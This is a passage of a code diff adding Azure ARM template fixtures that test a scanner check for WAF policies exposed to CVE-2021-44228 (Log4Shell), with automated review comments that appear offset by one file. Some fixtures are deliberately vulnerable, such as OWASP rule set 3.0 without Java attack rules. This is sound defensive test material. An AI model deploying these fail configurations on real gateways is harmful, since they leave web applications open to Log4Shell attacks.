"frontendIPConfigurations": [ + { + "name": "appGwPublicFrontendIp", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + 
"id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]" + } + } + } + ], + "frontendPorts": [ + { + "name": "port_80", + "properties": { + "port": 80 + } + } + ], + "backendAddressPools": [ + { + "name": "myBackendPool", + "properties": {} + } + ], + "backendHttpSettingsCollection": [ + { + "name": "myHTTPSetting", + "properties": { + "port": 80, + "protocol": "Http", + "cookieBasedAffinity": "Disabled", + "pickHostNameFromBackendAddress": false, + "requestTimeout": 20 + } + } + ], + "httpListeners": [ + { + "name": "myListener", + "properties": { + "firewallPolicy": { + "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + }, + "frontendIPConfiguration": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]" + }, + "frontendPort": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]" + }, + "protocol": "Http", + "requireServerNameIndication": false + } + } + ], + "requestRoutingRules": [ + { + "name": "myRoutingRule", + "properties": { + "ruleType": "Basic", + "priority": 10, + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]" + } + } + } + ], + "enableHttp2": false, + "firewallPolicy": { + "id": 
"[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "publicIPAddress" + ] + }, + { + "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies", + "apiVersion": "2021-08-01", + "name": "empty_disabled_rules_pass", + "location": "[parameters('location')]", + "properties": { + "customRules": [ + { + "name": "CustRule01", + "priority": 100, + "ruleType": "MatchRule", + "action": "Block", + "matchConditions": [ + { + "matchVariables": [ + { + "variableName": "RemoteAddr" + } + ], + "operator": "IPMatch", + "negationConditon": true, + "matchValues": [ + "10.10.10.0/24" + ] + } + ] + } + ], + "policySettings": { + "requestBodyCheck": true, + "maxRequestBodySizeInKb": 128, + "fileUploadLimitInMb": 100, + "state": "Enabled", + "mode": "Prevention" + }, + "managedRules": { + "managedRuleSets": [ + { + "ruleGroupOverrides": [ + { + "ruleGroupName": "REQUEST-944-APPLICATION-ATTACK-JAVA" + } + ], + "ruleSetType": "OWASP", + "ruleSetVersion": "3.1" + } + ] + } + } + }, + { + "copy": { + "name": "myNic", + "count": "[length(range(0, 2))]" + }, + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-08-01", + "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]", + "location": "[parameters('location')]", + "properties": { + "ipConfigurations": [ + { + "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]" + }, + "subnet": { + "id": 
"[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]" + }, + "primary": true, + "privateIPAddressVersion": "IPv4", + "applicationGatewayBackendAddressPools": [ + { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + } + ] + } + } + ], + "enableAcceleratedNetworking": false, + "enableIPForwarding": false, + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "nsg", + "publicIPAddress" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_0_fail.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_0_fail.json new file mode 100644 index 00000000000..8c9f335f1ea --- /dev/null +++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_0_fail.json 
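Review bot: The `ruleGroupOverrides` entry for `REQUEST-944-APPLICATION-ATTACK-JAVA` omits the `rules` key entirely, so this passing fixture only exercises the missing-key path; a check that does `override.get("rules")` and one that does `override["rules"]` diverge on `"rules": []`, so a second fixture with an explicit empty list would pin that both shapes count as "nothing disabled". Naming the Java group without disabling `944240` is the right pass shape for CVE-2021-44228, assuming the check keys on that rule id. Note also that the gateway's `firewallPolicy.id` still resolves to `WafPol01` rather than the policy named `empty_disabled_rules_pass`, so the fixture does not exercise any gateway-to-policy resolution the check might perform.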
@@ -0,0 +1,249 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "7253194970749033988" + } + }, + "parameters": { + "adminUsername": { + "type": "string", + "metadata": { + "description": "Admin username for the backend servers" + } + }, + "adminPassword": { + "type": "securestring", + "metadata": { + "description": "Password for the admin account on the backend servers" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "vmSize": { + "type": "string", + "defaultValue": "Standard_B2ms", + "metadata": { + "description": "Size of the virtual machine." + } + } + }, + "variables": { + "virtualMachines_myVM_name": "myVM", + "virtualNetworks_myVNet_name": "myVNet", + "myNic_name": "net-int", + "ipconfig_name": "ipconfig", + "publicIPAddress_name": "public_ip", + "nsg_name": "vm-nsg", + "applicationGateways_myAppGateway_name": "myAppGateway", + "vnet_prefix": "10.0.0.0/16", + "ag_subnet_prefix": "10.0.0.0/24", + "backend_subnet_prefix": "10.0.1.0/24", + "AppGW_AppFW_Pol_name": "WafPol01" + }, + "resources": [ + + { + "type": "Microsoft.Network/applicationGateways", + "apiVersion": "2021-08-01", + "name": "[variables('applicationGateways_myAppGateway_name')]", + "location": "[parameters('location')]", + "properties": { + "sku": { + "name": "WAF_v2", + "tier": "WAF_v2", + "capacity": 2 + }, + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGwPublicFrontendIp", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + 
"id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]" + } + } + } + ], + "frontendPorts": [ + { + "name": "port_80", + "properties": { + "port": 80 + } + } + ], + "backendAddressPools": [ + { + "name": "myBackendPool", + "properties": {} + } + ], + "backendHttpSettingsCollection": [ + { + "name": "myHTTPSetting", + "properties": { + "port": 80, + "protocol": "Http", + "cookieBasedAffinity": "Disabled", + "pickHostNameFromBackendAddress": false, + "requestTimeout": 20 + } + } + ], + "httpListeners": [ + { + "name": "myListener", + "properties": { + "firewallPolicy": { + "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + }, + "frontendIPConfiguration": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]" + }, + "frontendPort": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]" + }, + "protocol": "Http", + "requireServerNameIndication": false + } + } + ], + "requestRoutingRules": [ + { + "name": "myRoutingRule", + "properties": { + "ruleType": "Basic", + "priority": 10, + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]" + } + } + } + ], + "enableHttp2": false, + "firewallPolicy": { + "id": 
"[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "publicIPAddress" + ] + }, + { + "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies", + "apiVersion": "2021-08-01", + "name": "owasp_3_0_fail", + "location": "[parameters('location')]", + "properties": { + "customRules": [ + { + "name": "CustRule01", + "priority": 100, + "ruleType": "MatchRule", + "action": "Block", + "matchConditions": [ + { + "matchVariables": [ + { + "variableName": "RemoteAddr" + } + ], + "operator": "IPMatch", + "negationConditon": true, + "matchValues": [ + "10.10.10.0/24" + ] + } + ] + } + ], + "policySettings": { + "requestBodyCheck": true, + "maxRequestBodySizeInKb": 128, + "fileUploadLimitInMb": 100, + "state": "Enabled", + "mode": "Prevention" + }, + "managedRules": { + "managedRuleSets": [ + { + "ruleSetType": "OWASP", + "ruleSetVersion": "3.0" + } + ] + } + } + }, + { + "copy": { + "name": "myNic", + "count": "[length(range(0, 2))]" + }, + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-08-01", + "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]", + "location": "[parameters('location')]", + "properties": { + "ipConfigurations": [ + { + "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]" + }, + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 
'myBackendSubnet')]" + }, + "primary": true, + "privateIPAddressVersion": "IPv4", + "applicationGatewayBackendAddressPools": [ + { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + } + ] + } + } + ], + "enableAcceleratedNetworking": false, + "enableIPForwarding": false, + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "nsg", + "publicIPAddress" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_default_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_default_pass.json new file mode 100644 index 00000000000..35ce62af4c9 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_default_pass.json 
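Review bot: The WAF policy under test is named `owasp_3_0_fail`, but both the gateway's and the listener's `firewallPolicy.id` resolve `variables('AppGW_AppFW_Pol_name')` = `WafPol01`, so within the template the gateway attaches to a policy that does not exist. If the check is resource-local this is harmless; if it ever follows the reference from the gateway, the 3.0 policy would never be reached. Keeping the variable as the single source of truth, `"AppGW_AppFW_Pol_name": "owasp_3_0_fail"` in `variables` and `"name": "[variables('AppGW_AppFW_Pol_name')]"` on the policy, makes the fixture deployable and the fail case reachable either way. OWASP `3.0` lacking the Java rule group is the intended fail condition; a `2.2.9` sibling would cover the other pre-3.1 version if one does not already exist outside this chunk.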
@@ -0,0 +1,249 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "7253194970749033988" + } + }, + "parameters": { + "adminUsername": { + "type": "string", + "metadata": { + "description": "Admin username for the backend servers" + } + }, + "adminPassword": { + "type": "securestring", + "metadata": { + "description": "Password for the admin account on the backend servers" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "vmSize": { + "type": "string", + "defaultValue": "Standard_B2ms", + "metadata": { + "description": "Size of the virtual machine." + } + } + }, + "variables": { + "virtualMachines_myVM_name": "myVM", + "virtualNetworks_myVNet_name": "myVNet", + "myNic_name": "net-int", + "ipconfig_name": "ipconfig", + "publicIPAddress_name": "public_ip", + "nsg_name": "vm-nsg", + "applicationGateways_myAppGateway_name": "myAppGateway", + "vnet_prefix": "10.0.0.0/16", + "ag_subnet_prefix": "10.0.0.0/24", + "backend_subnet_prefix": "10.0.1.0/24", + "AppGW_AppFW_Pol_name": "WafPol01" + }, + "resources": [ + + { + "type": "Microsoft.Network/applicationGateways", + "apiVersion": "2021-08-01", + "name": "[variables('applicationGateways_myAppGateway_name')]", + "location": "[parameters('location')]", + "properties": { + "sku": { + "name": "WAF_v2", + "tier": "WAF_v2", + "capacity": 2 + }, + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGwPublicFrontendIp", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + 
"id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]" + } + } + } + ], + "frontendPorts": [ + { + "name": "port_80", + "properties": { + "port": 80 + } + } + ], + "backendAddressPools": [ + { + "name": "myBackendPool", + "properties": {} + } + ], + "backendHttpSettingsCollection": [ + { + "name": "myHTTPSetting", + "properties": { + "port": 80, + "protocol": "Http", + "cookieBasedAffinity": "Disabled", + "pickHostNameFromBackendAddress": false, + "requestTimeout": 20 + } + } + ], + "httpListeners": [ + { + "name": "myListener", + "properties": { + "firewallPolicy": { + "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + }, + "frontendIPConfiguration": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]" + }, + "frontendPort": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]" + }, + "protocol": "Http", + "requireServerNameIndication": false + } + } + ], + "requestRoutingRules": [ + { + "name": "myRoutingRule", + "properties": { + "ruleType": "Basic", + "priority": 10, + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]" + } + } + } + ], + "enableHttp2": false, + "firewallPolicy": { + "id": 
"[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "publicIPAddress" + ] + }, + { + "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies", + "apiVersion": "2021-08-01", + "name": "owasp_3_1_default_pass", + "location": "[parameters('location')]", + "properties": { + "customRules": [ + { + "name": "CustRule01", + "priority": 100, + "ruleType": "MatchRule", + "action": "Block", + "matchConditions": [ + { + "matchVariables": [ + { + "variableName": "RemoteAddr" + } + ], + "operator": "IPMatch", + "negationConditon": true, + "matchValues": [ + "10.10.10.0/24" + ] + } + ] + } + ], + "policySettings": { + "requestBodyCheck": true, + "maxRequestBodySizeInKb": 128, + "fileUploadLimitInMb": 100, + "state": "Enabled", + "mode": "Prevention" + }, + "managedRules": { + "managedRuleSets": [ + { + "ruleSetType": "OWASP", + "ruleSetVersion": "3.1" + } + ] + } + } + }, + { + "copy": { + "name": "myNic", + "count": "[length(range(0, 2))]" + }, + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-08-01", + "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]", + "location": "[parameters('location')]", + "properties": { + "ipConfigurations": [ + { + "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]" + }, + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 
'myBackendSubnet')]" + }, + "primary": true, + "privateIPAddressVersion": "IPv4", + "applicationGatewayBackendAddressPools": [ + { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + } + ] + } + } + ], + "enableAcceleratedNetworking": false, + "enableIPForwarding": false, + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "nsg", + "publicIPAddress" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_different_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_different_pass.json new file mode 100644 index 00000000000..29e7d9c3a4a --- /dev/null +++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_different_pass.json 
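Review bot: `3.1` is the lowest OWASP rule set version that ships the `REQUEST-944-APPLICATION-ATTACK-JAVA` group, so this fixture pins only the exact boundary value; the visible fixtures do not show how the check treats `"ruleSetVersion": "3.2"` or newer, which must also pass if the comparison is version-aware rather than a literal `== "3.1"`. An `owasp_3_2_pass.json` sibling would catch that regression; it may exist outside this chunk. As in the neighbouring fixtures, the policy name `owasp_3_1_default_pass` differs from `variables('AppGW_AppFW_Pol_name')`, leaving the gateway's `firewallPolicy.id` dangling within the template.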
@@ -0,0 +1,260 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "7253194970749033988" + } + }, + "parameters": { + "adminUsername": { + "type": "string", + "metadata": { + "description": "Admin username for the backend servers" + } + }, + "adminPassword": { + "type": "securestring", + "metadata": { + "description": "Password for the admin account on the backend servers" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "vmSize": { + "type": "string", + "defaultValue": "Standard_B2ms", + "metadata": { + "description": "Size of the virtual machine." + } + } + }, + "variables": { + "virtualMachines_myVM_name": "myVM", + "virtualNetworks_myVNet_name": "myVNet", + "myNic_name": "net-int", + "ipconfig_name": "ipconfig", + "publicIPAddress_name": "public_ip", + "nsg_name": "vm-nsg", + "applicationGateways_myAppGateway_name": "myAppGateway", + "vnet_prefix": "10.0.0.0/16", + "ag_subnet_prefix": "10.0.0.0/24", + "backend_subnet_prefix": "10.0.1.0/24", + "AppGW_AppFW_Pol_name": "WafPol01" + }, + "resources": [ + + + { + "type": "Microsoft.Network/applicationGateways", + "apiVersion": "2021-08-01", + "name": "[variables('applicationGateways_myAppGateway_name')]", + "location": "[parameters('location')]", + "properties": { + "sku": { + "name": "WAF_v2", + "tier": "WAF_v2", + "capacity": 2 + }, + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGwPublicFrontendIp", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { 
+ "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]" + } + } + } + ], + "frontendPorts": [ + { + "name": "port_80", + "properties": { + "port": 80 + } + } + ], + "backendAddressPools": [ + { + "name": "myBackendPool", + "properties": {} + } + ], + "backendHttpSettingsCollection": [ + { + "name": "myHTTPSetting", + "properties": { + "port": 80, + "protocol": "Http", + "cookieBasedAffinity": "Disabled", + "pickHostNameFromBackendAddress": false, + "requestTimeout": 20 + } + } + ], + "httpListeners": [ + { + "name": "myListener", + "properties": { + "firewallPolicy": { + "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + }, + "frontendIPConfiguration": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]" + }, + "frontendPort": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]" + }, + "protocol": "Http", + "requireServerNameIndication": false + } + } + ], + "requestRoutingRules": [ + { + "name": "myRoutingRule", + "properties": { + "ruleType": "Basic", + "priority": 10, + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]" + } + } + } + ], + "enableHttp2": false, + "firewallPolicy": { + "id": 
"[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "publicIPAddress" + ] + }, + { + "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies", + "apiVersion": "2021-08-01", + "name": "owasp_3_1_disabled_different_pass", + "location": "[parameters('location')]", + "properties": { + "customRules": [ + { + "name": "CustRule01", + "priority": 100, + "ruleType": "MatchRule", + "action": "Block", + "matchConditions": [ + { + "matchVariables": [ + { + "variableName": "RemoteAddr" + } + ], + "operator": "IPMatch", + "negationConditon": true, + "matchValues": [ + "10.10.10.0/24" + ] + } + ] + } + ], + "policySettings": { + "requestBodyCheck": true, + "maxRequestBodySizeInKb": 128, + "fileUploadLimitInMb": 100, + "state": "Enabled", + "mode": "Prevention" + }, + "managedRules": { + "managedRuleSets": [ + { + "ruleGroupOverrides": [ + { + "ruleGroupName": "REQUEST-944-APPLICATION-ATTACK-JAVA", + "rules": [ + { + "ruleId": "944200" + } + ] + } + ], + "ruleSetType": "OWASP", + "ruleSetVersion": "3.1" + } + ] + } + } + }, + { + "copy": { + "name": "myNic", + "count": "[length(range(0, 2))]" + }, + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-08-01", + "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]", + "location": "[parameters('location')]", + "properties": { + "ipConfigurations": [ + { + "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 
2)[copyIndex()], 1)))]" + }, + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]" + }, + "primary": true, + "privateIPAddressVersion": "IPv4", + "applicationGatewayBackendAddressPools": [ + { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + } + ] + } + } + ], + "enableAcceleratedNetworking": false, + "enableIPForwarding": false, + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "nsg", + "publicIPAddress" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_fail.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_fail.json new file mode 100644 index 00000000000..da52c7ae166 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_fail.json 
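Review bot: The `ruleGroupOverrides` entry for `944200` carries no `state`, so this pass fixture leans on the ARM default (the reference documents `ManagedRuleOverride.state` as defaulting to Disabled when omitted) rather than stating what it tests; `{ "ruleId": "944200", "state": "Disabled" }` makes the intent explicit. Newer API versions also accept `"state": "Enabled"` on an override, which means an entry listing `944240` with `"state": "Enabled"` is a legitimate pass case — if the check (outside this hunk) keys only on the presence of the rule id it would misreport that template, so a fixture for it is worth adding. The NIC resource's `dependsOn` also names `nsg` and `publicIPAddress` resources that no fixture in this set defines; harmless for a unit test, but it is copied noise.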
@@ -0,0 +1,157 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "7253194970749033988" + } + }, + "parameters": { + "adminUsername": { + "type": "string", + "metadata": { + "description": "Admin username for the backend servers" + } + }, + "adminPassword": { + "type": "securestring", + "metadata": { + "description": "Password for the admin account on the backend servers" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "vmSize": { + "type": "string", + "defaultValue": "Standard_B2ms", + "metadata": { + "description": "Size of the virtual machine." + } + } + }, + "variables": { + "virtualMachines_myVM_name": "myVM", + "virtualNetworks_myVNet_name": "myVNet", + "myNic_name": "net-int", + "ipconfig_name": "ipconfig", + "publicIPAddress_name": "public_ip", + "nsg_name": "vm-nsg", + "applicationGateways_myAppGateway_name": "myAppGateway", + "vnet_prefix": "10.0.0.0/16", + "ag_subnet_prefix": "10.0.0.0/24", + "backend_subnet_prefix": "10.0.1.0/24", + "AppGW_AppFW_Pol_name": "WafPol01" + }, + "resources": [ + + + { + "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies", + "apiVersion": "2021-08-01", + "name": "owasp_3_1_disabled_fail", + "location": "[parameters('location')]", + "properties": { + "customRules": [ + { + "name": "CustRule01", + "priority": 100, + "ruleType": "MatchRule", + "action": "Block", + "matchConditions": [ + { + "matchVariables": [ + { + "variableName": "RemoteAddr" + } + ], + "operator": "IPMatch", + "negationConditon": true, + "matchValues": [ + "10.10.10.0/24" + ] + } + ] + } + ], + "policySettings": { + "requestBodyCheck": true, + "maxRequestBodySizeInKb": 128, + "fileUploadLimitInMb": 100, + "state": "Enabled", + "mode": 
